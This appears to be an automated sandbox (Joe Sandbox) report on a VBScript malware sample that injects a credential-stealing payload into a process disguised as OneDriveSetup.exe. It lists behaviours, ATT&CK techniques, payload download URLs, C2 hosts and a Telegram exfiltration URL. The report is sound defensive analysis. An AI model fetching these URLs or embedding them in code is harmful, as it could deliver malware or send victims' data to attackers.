                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in front of a technique is the report's signature-count badge for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Native API; 1 Exploitation for Client Execution; 12 Command and Scripting Interpreter; 3 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 111 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 311 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 1 File and Directory Discovery; 24 System Information Discovery; 31 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1562920
Sample: Doc261124.vbs
Startdate: 26/11/2024
Architecture: WINDOWS
Score: 100

Graph nodes (bracketed numbers after a process are the created-file and registry-value counts explained in the legend):

Start
• Contacts: reallyfreegeoip.org; paste.ee; 7 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 14 other signatures
• reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
• paste.ee: Connects to a pastebin service (likely for C&C)
• Started: wscript.exe [1]

wscript.exe [1]
• Contacts: paste.ee 104.21.84.67, 443, 49705, 49706 CLOUDFLARENETUS United States
• Signatures: System process connects to network (likely due to code injection or exploit); VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; 4 other signatures
• Started: powershell.exe [7]

powershell.exe [7]
• Signatures: Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading
• Started: powershell.exe [14 16]; conhost.exe

powershell.exe [14 16]
• Contacts: sbv.pushswroller.eu 5.182.211.149, 49711, 80 SKB-ENTERPRISENL Netherlands; ip.3105.filemail.com 193.30.119.205, 443, 49707 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown
• Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
• Started: OneDriveSetup.exe [15 2]

OneDriveSetup.exe [15 2]
• Contacts: sws.swpushroller.eu 45.80.158.30, 49731, 80 UK2NET-ASGB Netherlands; api.telegram.org 149.154.167.220, 443, 49730 TELEGRAMRU United Kingdom; 2 other IPs or domains
• Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Antivirus detection (Source | Detection | Scanner | Label)
Doc261124.vbs | 8% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches

URL detection (Source | Detection | Scanner | Label)
http://sws.swpushroller.eu/swsk/P4.php | 0% | Avira URL Cloud | safe
http://sws.swpushroller.eu/swsk/api.php | 0% | Avira URL Cloud | safe
https://3105.filemail.com/ | 0% | Avira URL Cloud | safe
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd | 0% | Avira URL Cloud | safe
http://sws.swpushroller.eu | 0% | Avira URL Cloud | safe
http://sbv.pushswroller.eu/gfy/gesr.txt | 100% | Avira URL Cloud | malware
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c | 0% | Avira URL Cloud | safe
https://3105.filemail.com | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
paste.ee | 104.21.84.67 | true | false | - | high
reallyfreegeoip.org | 172.67.177.134 | true | false | - | high
ip.3105.filemail.com | 193.30.119.205 | true | true | - | unknown
sbv.pushswroller.eu | 5.182.211.149 | true | true | - | unknown
api.telegram.org | 149.154.167.220 | true | false | - | high
sws.swpushroller.eu | 45.80.158.30 | true | false | - | high
checkip.dyndns.com | 193.122.6.168 | true | false | - | high
checkip.dyndns.org | unknown | unknown | false | - | high
3105.filemail.com | unknown | unknown | false | - | high
URLs contacted (Name | Malicious | Antivirus Detection | Reputation)
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2027/11/2024%20/%2008:13:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | high
http://checkip.dyndns.org/ | false | - | high
http://sws.swpushroller.eu/swsk/P4.php | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.75 | false | - | high
http://sbv.pushswroller.eu/gfy/gesr.txt | true | Avira URL Cloud: malware | unknown
https://paste.ee/d/MQJcS | false | - | high
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c | true | Avira URL Cloud: safe | unknown
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation)
https://3105.filemail.com/ | powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd | powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://paste.ee/d/MQJcS | wscript.exe, 00000000.00000003.1460347182.000002BB95151000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463456856.000002BB93885000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://paste.ee/d/MQJcS_ | wscript.exe, 00000000.00000002.1463009577.000002BB936B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461792531.000002BB936B8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.office.com/lB | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008D09000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://analytics.paste.ee | wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://paste.ee/d/MQJcSW | wscript.exe, 00000000.00000003.1462205544.000002BB956B0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6 | powershell.exe, 00000002.00000002.1993680537.000002380380F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=en | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://varders.kozow.com:8081 | OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://paste.ee/d/MQJcSRqM | wscript.exe, 00000000.00000003.1459934063.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463164528.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461721432.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458797095.000002BB93727000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://paste.ee:443/d/MQJcS | wscript.exe, 00000000.00000002.1463305435.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1460132187.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/8.46.123.75$ | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BDA000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C20000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org/q | OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=enlB | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008CD8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdnjs.cloudflare.com | wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdnjs.cloudflare.com; | wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1993680537.000002380385E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://secure.gravatar.com | wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/ | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BB0000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.office.com/ | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008D0E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com; | wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://sws.swpushroller.eu | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20a | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://paste.ee/UqB | wscript.exe, 00000000.00000003.1459934063.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463164528.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461721432.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458797095.000002BB93727000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://aborters.duckdns.org:8081 | OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://51.38.247.67:8081/_send_.php?L | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://anotherarmy.dns.army:8081 | OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://analytics.paste.ee; | wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org | OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BB0000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C20000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://sws.swpushroller.eu/swsk/api.php | OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1993680537.000002380382A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmp | false | - |
                                                                                                                                      high
                                                                                                                                      https://themes.googleusercontent.comwscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://3105.filemail.compowershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedOneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
45.80.158.30 | sws.swpushroller.eu | Netherlands | 13213 | UK2NET-ASGB | false
193.30.119.205 | ip.3105.filemail.com | unknown | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
104.21.84.67 | paste.ee | United States | 13335 | CLOUDFLARENETUS | false
5.182.211.149 | sbv.pushswroller.eu | Netherlands | 64425 | SKB-ENTERPRISENL | true
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562920
Start date and time: 2024-11-26 09:31:52 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Doc261124.vbs
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winVBS@8/6@7/7
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 91
• Number of non-executed functions: 51
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7928 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Doc261124.vbs
Time | Type | Description
03:32:52 | API Interceptor | 2x Sleep call for process: wscript.exe modified
03:32:53 | API Interceptor | 70x Sleep call for process: powershell.exe modified
03:33:23 | API Interceptor | 927692x Sleep call for process: OneDriveSetup.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | RemittanceAdvice35282-17.xll.dll | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe | malicious | MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe | malicious | MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | Halkbank_Ekstre_25112024 _073809_405251.exe | malicious | Snake Keylogger |
149.154.167.220 | INVITATION TO BID as on 25 NOV 2024.html | malicious | HTMLPhisher |
